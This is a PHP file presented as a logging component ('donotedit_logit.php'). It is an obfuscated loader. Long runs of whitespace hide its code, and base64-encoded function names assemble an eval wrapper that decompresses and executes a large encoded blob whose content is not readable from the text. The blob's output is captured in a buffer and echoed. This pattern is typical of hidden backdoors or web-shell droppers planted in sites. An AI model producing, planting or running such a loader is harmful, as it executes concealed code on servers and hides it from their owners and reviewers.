<?php 
        $__='printf';$_='Loading donotedit_logit.php_4.7.3';
        







































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































                                                                                                                                                                                                                     $________;
